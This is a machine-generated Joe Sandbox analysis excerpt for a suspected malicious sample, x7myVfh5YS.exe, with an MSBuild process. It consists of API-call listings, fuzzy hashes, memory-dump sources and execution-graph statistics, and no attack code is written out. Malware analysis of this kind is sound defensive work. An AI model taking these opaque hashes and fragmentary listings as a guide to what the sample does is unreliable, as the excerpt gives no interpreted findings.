                          Similarity
                          • API ID: FeaturePresentProcessor
                          • String ID:
                          • API String ID: 2325560087-0
                          • Opcode ID: 78934c33e63def694bec5ec50f00ef65b68ad9c6392bf43ddfdeae2c84f187d1
                          • Instruction ID: cfd8d9ee9819f560c4b4859e2b8b0866671448917aee81b21336b4097f1d90f0
                          • Opcode Fuzzy Hash: 78934c33e63def694bec5ec50f00ef65b68ad9c6392bf43ddfdeae2c84f187d1
                          • Instruction Fuzzy Hash: 89519EB9F122098FEB64CF98C48279EBBF0FB49359F24856AD515EB740D375AA00CB50
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a37a760330a1e55ac33ad7d3a6640ce9f5aaad6c5be877317adf74798fc14a7b
                          • Instruction ID: 8bbda8d25a4aefd6bf3ad251ec37aa0edaa96c5753580bbcee431cb5d2b2a510
                          • Opcode Fuzzy Hash: a37a760330a1e55ac33ad7d3a6640ce9f5aaad6c5be877317adf74798fc14a7b
                          • Instruction Fuzzy Hash: AD41A375905218AECB10DF69CC88AEABBB9AB49348F2442DDE41DD3300DB359E45CF50
                          Strings
                          Similarity
                          • API ID:
                          • String ID: 7At<
                          • API String ID: 0-1507604614
                          • Opcode ID: 877457a4a92b6edcef25588ba2a5dd4a64a9aed37e39daae6a604cef7fb98ba7
                          • Instruction ID: de2cf6c1cb06292b26698269ed2d58456c50f758dbf8917fd7f3388b49409ca7
                          • Opcode Fuzzy Hash: 877457a4a92b6edcef25588ba2a5dd4a64a9aed37e39daae6a604cef7fb98ba7
                          • Instruction Fuzzy Hash: B151C076B442498FDB04CEFCC8917DEBBF1AF4B324F21811AD415E7B51C236A9069B64
                          APIs
                          • type_info::operator==.LIBVCRUNTIME ref: 6CEEA459
                          • ___TypeMatch.LIBVCRUNTIME ref: 6CEEA567
                          • CatchIt.LIBVCRUNTIME ref: 6CEEA5B8
                          • _UnwindNestedFrames.LIBCMT ref: 6CEEA6B9
                          • CallUnexpected.LIBVCRUNTIME ref: 6CEEA6D4
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2026220018.000000006CED1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CED0000, based on PE: true
                          • Associated: 00000000.00000002.2026193703.000000006CED0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000000.00000002.2026330535.000000006CEF4000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000000.00000002.2026353136.000000006CEFB000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000000.00000002.2026353136.000000006CFCD000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000000.00000002.2026786153.000000006CFD0000.00000020.00000001.01000000.00000006.sdmp
                          • Associated: 00000000.00000002.2026832681.000000006CFDB000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6ced0000_x7myVfh5YS.jbxd
                          Similarity
                          • API ID: CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                          • String ID: csm$csm$csm
                          • API String ID: 4119006552-393685449
                          • Opcode ID: 4927550de08f43e678f1bc72960fd00bd2d17d3c3e9c4021587a75f09950c64e
                          • Instruction ID: c83276840669e352bcceb0caf86627718b701d89833a7059d8ac6cee6dbbf479
                          • Opcode Fuzzy Hash: 4927550de08f43e678f1bc72960fd00bd2d17d3c3e9c4021587a75f09950c64e
                          • Instruction Fuzzy Hash: 07B1667188120AEFCF05CFA4C88099EBBB5BF09398B34426EE8116BB15D731DA55CF91
                          APIs
                          • _ValidateLocalCookies.LIBCMT ref: 6CEE9417
                          • ___except_validate_context_record.LIBVCRUNTIME ref: 6CEE941F
                          • _ValidateLocalCookies.LIBCMT ref: 6CEE94A8
                          • __IsNonwritableInCurrentImage.LIBCMT ref: 6CEE94D3
                          • _ValidateLocalCookies.LIBCMT ref: 6CEE9528
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2026220018.000000006CED1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CED0000, based on PE: true
                          • Associated: 00000000.00000002.2026193703.000000006CED0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000000.00000002.2026330535.000000006CEF4000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000000.00000002.2026353136.000000006CEFB000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000000.00000002.2026353136.000000006CFCD000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000000.00000002.2026786153.000000006CFD0000.00000020.00000001.01000000.00000006.sdmp
                          • Associated: 00000000.00000002.2026832681.000000006CFDB000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6ced0000_x7myVfh5YS.jbxd
                          Similarity
                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                          • String ID: csm
                          • API String ID: 1170836740-1018135373
                          • Opcode ID: a9f7b27c8c967d16d627cae6cb27dad7481ead462856a6667fc4adcbf77cb18f
                          • Instruction ID: 0a1f5b54aa3aab11c7dadabf0cf689acd2b224d9a4c2493a02c634c07c5132d4
                          • Opcode Fuzzy Hash: a9f7b27c8c967d16d627cae6cb27dad7481ead462856a6667fc4adcbf77cb18f
                          • Instruction Fuzzy Hash: A241B674A002499FCF00CF68C8C4ADE7BF5AF4A36CF348559E8249B751D7359A05CB91
                          APIs
                          • FreeLibrary.KERNEL32(00000000,?,6CEEE3B9,00000000,6CEEBBC0,00000000,00000000,00000001,?,6CEEE532,00000022,FlsSetValue,6CEF5CD8,6CEF5CE0,00000000), ref: 6CEEE36B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2026220018.000000006CED1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CED0000, based on PE: true
                          • Associated: 00000000.00000002.2026193703.000000006CED0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000000.00000002.2026330535.000000006CEF4000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000000.00000002.2026353136.000000006CEFB000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000000.00000002.2026353136.000000006CFCD000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000000.00000002.2026786153.000000006CFD0000.00000020.00000001.01000000.00000006.sdmp
                          • Associated: 00000000.00000002.2026832681.000000006CFDB000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6ced0000_x7myVfh5YS.jbxd
                          Similarity
                          • API ID: FreeLibrary
                          • String ID: api-ms-$ext-ms-
                          • API String ID: 3664257935-537541572
                          • Opcode ID: a2f43d2fbadf89e451208b9655b4e310ca4b3957285a0bcb7851fc24fbcfd451
                          • Instruction ID: 94175e2d64006a97b55bf4edefaec7191928b7e80d8c3ba2752c3dcab0a29d5d
                          • Opcode Fuzzy Hash: a2f43d2fbadf89e451208b9655b4e310ca4b3957285a0bcb7851fc24fbcfd451
                          • Instruction Fuzzy Hash: 0E21E732B06A10BBDB219B65DC50A4E77789B4B7E8B350225ED25A7B80D770EE01C6D1
                          APIs
                          • GetLastError.KERNEL32(?,?,6CEE9983,6CEE96E0), ref: 6CEE999A
                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6CEE99A8
                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6CEE99C1
                          • SetLastError.KERNEL32(00000000,6CEE9983,6CEE96E0), ref: 6CEE9A13
                          Memory Dump Source
                          • Source File: 00000000.00000002.2026220018.000000006CED1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CED0000, based on PE: true
                          • Associated: 00000000.00000002.2026193703.000000006CED0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000000.00000002.2026330535.000000006CEF4000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000000.00000002.2026353136.000000006CEFB000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000000.00000002.2026353136.000000006CFCD000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000000.00000002.2026786153.000000006CFD0000.00000020.00000001.01000000.00000006.sdmp
                          • Associated: 00000000.00000002.2026832681.000000006CFDB000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6ced0000_x7myVfh5YS.jbxd
                          Similarity
                          • API ID: ErrorLastValue___vcrt_
                          • String ID:
                          • API String ID: 3852720340-0
                          • Opcode ID: 0babe6df32f24f99f9f81910505831beda08ce9d40ccbc8cbdfc395cc0528b61
                          • Instruction ID: 7a1c0316277bcfee87622f4657a728d4fc6932cddb0f2afc786f7daa98f23699
                          • Opcode Fuzzy Hash: 0babe6df32f24f99f9f81910505831beda08ce9d40ccbc8cbdfc395cc0528b61
                          • Instruction Fuzzy Hash: A101D47675D7216EEB2026766C856D73AB8DB0B3FD730072EE52452BD0EF5388055290
                          Strings
                          • C:\Users\user\Desktop\x7myVfh5YS.exe, xrefs: 6CEED4FA
                          Memory Dump Source
                          • Source File: 00000000.00000002.2026220018.000000006CED1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CED0000, based on PE: true
                          • Associated: 00000000.00000002.2026193703.000000006CED0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000000.00000002.2026330535.000000006CEF4000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000000.00000002.2026353136.000000006CEFB000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000000.00000002.2026353136.000000006CFCD000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000000.00000002.2026786153.000000006CFD0000.00000020.00000001.01000000.00000006.sdmp
                          • Associated: 00000000.00000002.2026832681.000000006CFDB000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6ced0000_x7myVfh5YS.jbxd
                          Similarity
                          • API ID:
                          • String ID: C:\Users\user\Desktop\x7myVfh5YS.exe
                          • API String ID: 0-3473576472
                          • Opcode ID: 70e88cdbd8d0dcc66cf39fc33045c75fce86ddfd36145c83ca8675eef997ceb6
                          • Instruction ID: 9754d157458a90722438b4e619bab74636d741f750d61898f31cfb9103134521
                          • Opcode Fuzzy Hash: 70e88cdbd8d0dcc66cf39fc33045c75fce86ddfd36145c83ca8675eef997ceb6
                          • Instruction Fuzzy Hash: E6215375204205EFDB10AF75885099A7779EF8D3AC7244519F92897B40E731EA18CB50
                          APIs
                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB9B7CD4,00000000,?,00000000,6CEF3DF2,000000FF,?,6CEEB488,?,?,6CEEB45C,?), ref: 6CEEB523
                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6CEEB535
                          • FreeLibrary.KERNEL32(00000000,?,00000000,6CEF3DF2,000000FF,?,6CEEB488,?,?,6CEEB45C,?), ref: 6CEEB557
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2026220018.000000006CED1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CED0000, based on PE: true
                          • Associated: 00000000.00000002.2026193703.000000006CED0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000000.00000002.2026330535.000000006CEF4000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000000.00000002.2026353136.000000006CEFB000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000000.00000002.2026353136.000000006CFCD000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000000.00000002.2026786153.000000006CFD0000.00000020.00000001.01000000.00000006.sdmp
                          • Associated: 00000000.00000002.2026832681.000000006CFDB000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6ced0000_x7myVfh5YS.jbxd
                          Similarity
                          • API ID: AddressFreeHandleLibraryModuleProc
                          • String ID: CorExitProcess$mscoree.dll
                          • API String ID: 4061214504-1276376045
                          • Opcode ID: 594efda2ea15f0205773538cf5c6d1bb55cf062099607968d1669bbe18fd2077
                          • Instruction ID: a4fe59ae80b92f8f0fc9850d7d455f22d4e34fddc46da3792cf3cf1777bca5a9
                          • Opcode Fuzzy Hash: 594efda2ea15f0205773538cf5c6d1bb55cf062099607968d1669bbe18fd2077
                          • Instruction Fuzzy Hash: 5F01A236A04659EBDB018F54DD09FAE7BB9FB45759F204526E832A2680DB349900CA91
                          APIs
                          • EncodePointer.KERNEL32(00000000,?), ref: 6CEEA704
                          • CatchIt.LIBVCRUNTIME ref: 6CEEA7EA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2026220018.000000006CED1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CED0000, based on PE: true
                          • Associated: 00000000.00000002.2026193703.000000006CED0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000000.00000002.2026330535.000000006CEF4000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000000.00000002.2026353136.000000006CEFB000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000000.00000002.2026353136.000000006CFCD000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000000.00000002.2026786153.000000006CFD0000.00000020.00000001.01000000.00000006.sdmp
                          • Associated: 00000000.00000002.2026832681.000000006CFDB000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6ced0000_x7myVfh5YS.jbxd
                          Similarity
                          • API ID: CatchEncodePointer
                          • String ID: MOC$RCC
                          • API String ID: 1435073870-2084237596
                          • Opcode ID: 35964bf8bf80be2c4c9d331b23a06e7085fa6574eccc4963ca0c51803de52af1
                          • Instruction ID: d6e912a2c2f9da94ea1abfea8bd4f7ad2123cf4f964bcb3a58dfde257ec73eea
                          • Opcode Fuzzy Hash: 35964bf8bf80be2c4c9d331b23a06e7085fa6574eccc4963ca0c51803de52af1
                          • Instruction Fuzzy Hash: 36414672900209AFDF06CF95CC80AEEBBB5BF4C348F24815DE914A7660E3359A51DB51
                          APIs
                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,6CEE9F13,00000000,?,6CFCF0D0,?,?,?,6CEEA0B6,00000004,InitializeCriticalSectionEx,6CEF53E8,InitializeCriticalSectionEx), ref: 6CEE9F6F
                          • GetLastError.KERNEL32(?,6CEE9F13,00000000,?,6CFCF0D0,?,?,?,6CEEA0B6,00000004,InitializeCriticalSectionEx,6CEF53E8,InitializeCriticalSectionEx,00000000,?,6CEE9A82), ref: 6CEE9F79
                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 6CEE9FA1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2026220018.000000006CED1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CED0000, based on PE: true
                          • Associated: 00000000.00000002.2026193703.000000006CED0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000000.00000002.2026330535.000000006CEF4000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000000.00000002.2026353136.000000006CEFB000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000000.00000002.2026353136.000000006CFCD000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000000.00000002.2026786153.000000006CFD0000.00000020.00000001.01000000.00000006.sdmp
                          • Associated: 00000000.00000002.2026832681.000000006CFDB000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6ced0000_x7myVfh5YS.jbxd
                          Similarity
                          • API ID: LibraryLoad$ErrorLast
                          • String ID: api-ms-
                          • API String ID: 3177248105-2084034818
                          • Opcode ID: a8fdba91b658ceaa555af92f40fa3fccb1ebbf18b08c26d3903c08177a63de42
                          • Instruction ID: de1ae769a11f301bab9935e72b150b44dbbe07f501c4ed090bd2667a98b833a9
                          • Opcode Fuzzy Hash: a8fdba91b658ceaa555af92f40fa3fccb1ebbf18b08c26d3903c08177a63de42
                          • Instruction Fuzzy Hash: 0EE04831348208FBEF001AA1DD06B5D3EB59B45789F344035F91CEC591D7E2D550C995
                          APIs
                          • GetConsoleOutputCP.KERNEL32(BB9B7CD4), ref: 6CEF06D5
                            • Part of subcall function 6CEEE0AC: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6CEF0110,?,00000000,-00000008), ref: 6CEEE10D
                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6CEF0927
                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6CEF096D
                          • GetLastError.KERNEL32 ref: 6CEF0A10
                          Memory Dump Source
                          • Source File: 00000000.00000002.2026220018.000000006CED1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CED0000, based on PE: true
                          • Associated: 00000000.00000002.2026193703.000000006CED0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000000.00000002.2026330535.000000006CEF4000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000000.00000002.2026353136.000000006CEFB000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000000.00000002.2026353136.000000006CFCD000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000000.00000002.2026786153.000000006CFD0000.00000020.00000001.01000000.00000006.sdmp
                          • Associated: 00000000.00000002.2026832681.000000006CFDB000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6ced0000_x7myVfh5YS.jbxd
                          Similarity
                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                          • String ID:
                          • API String ID: 2112829910-0
                          • Opcode ID: 88f5ed461a235142f54b62152d2c7148721862a2361ffc66c2597e62de70b592
                          • Instruction ID: 7e443f2d98a616f601ffd91ad84aa2ba9d80e9b9dd9a476b3c9da5b1627c0533
                          • Opcode Fuzzy Hash: 88f5ed461a235142f54b62152d2c7148721862a2361ffc66c2597e62de70b592
                          • Instruction Fuzzy Hash: 59D17B75E012889FDF01CFA8C880AEDBBB5EF49318F24456AE465EB741E730A942CF50
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2026220018.000000006CED1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CED0000, based on PE: true
                          • Associated: 00000000.00000002.2026193703.000000006CED0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000000.00000002.2026330535.000000006CEF4000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000000.00000002.2026353136.000000006CEFB000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000000.00000002.2026353136.000000006CFCD000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000000.00000002.2026786153.000000006CFD0000.00000020.00000001.01000000.00000006.sdmp
                          • Associated: 00000000.00000002.2026832681.000000006CFDB000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6ced0000_x7myVfh5YS.jbxd
                          Similarity
                          • API ID: AdjustPointer
                          • String ID:
                          • API String ID: 1740715915-0
                          • Opcode ID: 92e9e05965bcdc61c25f57d312b8b1cb89428022bf505fc0a7e20785e51081ef
                          • Instruction ID: fb245f2c64dfd3336bfef1ca2a532cb61d8d7e7d3bb1bc987607e43197962912
                          • Opcode Fuzzy Hash: 92e9e05965bcdc61c25f57d312b8b1cb89428022bf505fc0a7e20785e51081ef
                          • Instruction Fuzzy Hash: F15103B2685702AFDB148F55D880BAA7BB4FF0D398F30452DD82557B90E732E885CB50
                          APIs
                            • Part of subcall function 6CEEE0AC: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6CEF0110,?,00000000,-00000008), ref: 6CEEE10D
                          • GetLastError.KERNEL32 ref: 6CEECD5C
                          • __dosmaperr.LIBCMT ref: 6CEECD63
                          • GetLastError.KERNEL32(?,?,?,?), ref: 6CEECD9D
                          • __dosmaperr.LIBCMT ref: 6CEECDA4
                          Memory Dump Source
                          • Source File: 00000000.00000002.2026220018.000000006CED1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CED0000, based on PE: true
                          • Associated: 00000000.00000002.2026193703.000000006CED0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000000.00000002.2026330535.000000006CEF4000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000000.00000002.2026353136.000000006CEFB000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000000.00000002.2026353136.000000006CFCD000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000000.00000002.2026786153.000000006CFD0000.00000020.00000001.01000000.00000006.sdmp
                          • Associated: 00000000.00000002.2026832681.000000006CFDB000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6ced0000_x7myVfh5YS.jbxd
                          Similarity
                          • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                          • String ID:
                          • API String ID: 1913693674-0
                          • Opcode ID: 20a31cd6c39f1b08cb125a09d4b742a81b27af005b66ef67ec0fbcd5d26bb106
                          • Instruction ID: 28f0d9cbcdda8a51f4d453d833f565c567090a9f35386e666bd82ea97fea3942
                          • Opcode Fuzzy Hash: 20a31cd6c39f1b08cb125a09d4b742a81b27af005b66ef67ec0fbcd5d26bb106
                          • Instruction Fuzzy Hash: 0C21B631304225AFDB10AF66884089A7FBDFF4D3EC724861DE91997B40E731ED508790
                          APIs
                          • GetEnvironmentStringsW.KERNEL32 ref: 6CEEE157
                            • Part of subcall function 6CEEE0AC: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6CEF0110,?,00000000,-00000008), ref: 6CEEE10D
                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6CEEE18F
                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6CEEE1AF
                          Memory Dump Source
                          • Source File: 00000000.00000002.2026220018.000000006CED1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CED0000, based on PE: true
                          • Associated: 00000000.00000002.2026193703.000000006CED0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000000.00000002.2026330535.000000006CEF4000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000000.00000002.2026353136.000000006CEFB000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000000.00000002.2026353136.000000006CFCD000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000000.00000002.2026786153.000000006CFD0000.00000020.00000001.01000000.00000006.sdmp
                          • Associated: 00000000.00000002.2026832681.000000006CFDB000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6ced0000_x7myVfh5YS.jbxd
                          Similarity
                          • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                          • String ID:
                          • API String ID: 158306478-0
                          • Opcode ID: 0e47fe36104d26145009937901286059c30e73938323169c76b4b527633b6681
                          • Instruction ID: f2d3a87328585bece23c8ec5906ca2af8bc419701d29e4baf77cab03bd135a86
                          • Opcode Fuzzy Hash: 0e47fe36104d26145009937901286059c30e73938323169c76b4b527633b6681
                          • Instruction Fuzzy Hash: 2411A1B3605915BFAB1126BA5C88CAF7E7CDF9E2EC3240429F801A3700FB209E4585F0
                          APIs
                          • WriteConsoleW.KERNEL32(?,?,?,00000000,?,?,6CEF17A6,?,00000001,?,?,?,6CEF0A64), ref: 6CEF1FFE
                          • GetLastError.KERNEL32(?,6CEF17A6,?,00000001,?,?,?,6CEF0A64), ref: 6CEF200A
                            • Part of subcall function 6CEF1FCF: CloseHandle.KERNEL32(FFFFFFFE,6CEF201A,?,6CEF17A6,?,00000001,?,?,?,6CEF0A64), ref: 6CEF1FDF
                          • ___initconout.LIBCMT ref: 6CEF201A
                            • Part of subcall function 6CEF1F91: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6CEF1FC0,6CEF1793,?,?,6CEF0A64), ref: 6CEF1FA4
                          • WriteConsoleW.KERNEL32(?,?,?,00000000,?,6CEF17A6,?,00000001,?,?,?,6CEF0A64), ref: 6CEF202F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2026220018.000000006CED1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CED0000, based on PE: true
                          • Associated: 00000000.00000002.2026193703.000000006CED0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000000.00000002.2026330535.000000006CEF4000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000000.00000002.2026353136.000000006CEFB000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000000.00000002.2026353136.000000006CFCD000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000000.00000002.2026786153.000000006CFD0000.00000020.00000001.01000000.00000006.sdmp
                          • Associated: 00000000.00000002.2026832681.000000006CFDB000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6ced0000_x7myVfh5YS.jbxd
                          Similarity
                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                          • String ID:
                          • API String ID: 2744216297-0
                          • Opcode ID: 217b512fa567aeed598a86a3e56f940606d782a8439160dbeb7757cfe229902c
                          • Instruction ID: 3cb2f9f2ad2fd9b33968d8192f83098d219b8d308eff18684879c684145c5b70
                          • Opcode Fuzzy Hash: 217b512fa567aeed598a86a3e56f940606d782a8439160dbeb7757cfe229902c
                          • Instruction Fuzzy Hash: 1EF01C37604158BBCF121FD5DD09A8A3F77EF493B4B144014FA2886620CB32C920DB91

                          Execution Graph

                          Execution Coverage:12.8%
                          Dynamic/Decrypted Code Coverage:100%
                          Signature Coverage:0%
                          Total number of Nodes:14
                          Total number of Limit Nodes:0
                          execution_graph 61359 651d3c8 61360 651d40e KiUserCallbackDispatcher 61359->61360 61362 651d461 61360->61362 61363 12a4a40 61364 12a4a54 61363->61364 61366 12a59a4 61363->61366 61369 12ac9d0 61366->61369 61371 12ac9e3 61369->61371 61373 12aca80 61371->61373 61374 12acac8 VirtualProtect 61373->61374 61376 12a59ba 61374->61376 61377 12acc50 61378 12acc90 FindCloseChangeNotification 61377->61378 61380 12accc1 61378->61380
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: ,nq$4$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq
                          • API String ID: 0-162385967
                          • Opcode ID: 440acdd55945503f9fed4a5f8b797d6aa3708b4be5df121dd9000d2f3a02f3e3
                          • Instruction ID: 70af60b2a20496e67110312edf31b602c3273222fe85a07f0ade7dd7d7675d84
                          • Opcode Fuzzy Hash: 440acdd55945503f9fed4a5f8b797d6aa3708b4be5df121dd9000d2f3a02f3e3
                          • Instruction Fuzzy Hash: 20B2E635A002289FDB14DFA8C994FADB7B6BF48300F158599E915AB3A5DB70EC81CF50
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: ,nq$4$$jq$$jq$$jq$$jq
                          • API String ID: 0-3947795074
                          • Opcode ID: f299f42ed109e4e497023cc52e7a4bb9c4b30d9df33cbbd7c3239bdd2ce51ba1
                          • Instruction ID: 022f2c36778e2708359f38df0e96d195260d56c33c81b8657eb8baf531edf48e
                          • Opcode Fuzzy Hash: f299f42ed109e4e497023cc52e7a4bb9c4b30d9df33cbbd7c3239bdd2ce51ba1
                          • Instruction Fuzzy Hash: 3522F935A00219DFDB24DF65C984FADB7B6FF48300F1481A9E509AB2A5DB70AD85CF50

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: $A$E$T$U
                          • API String ID: 0-1503325869
                          • Opcode ID: bab4e079f1db4938cf41bdc7d05b2de850fca89d6f66912ec1eee2aa078b2f21
                          • Instruction ID: 594c6857a92192eb4268293f7c62a373bfce60ddfa64a714d41061256c195e2f
                          • Opcode Fuzzy Hash: bab4e079f1db4938cf41bdc7d05b2de850fca89d6f66912ec1eee2aa078b2f21
                          • Instruction Fuzzy Hash: F422C070E002448FDF11DB68C885BBEBBB3AF85304F19C5E9D4566B296DB34D886CB91

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: .$K$c
                          • API String ID: 0-3458198900
                          • Opcode ID: f47513e097aa48aeaa49c1c6ad777c4113a0955e9828f071745c73004f0f0b44
                          • Instruction ID: 7d7465ee293cb1a26c643b36c9e7b64da072ff63ee07e9d48de5a03d8371c406
                          • Opcode Fuzzy Hash: f47513e097aa48aeaa49c1c6ad777c4113a0955e9828f071745c73004f0f0b44
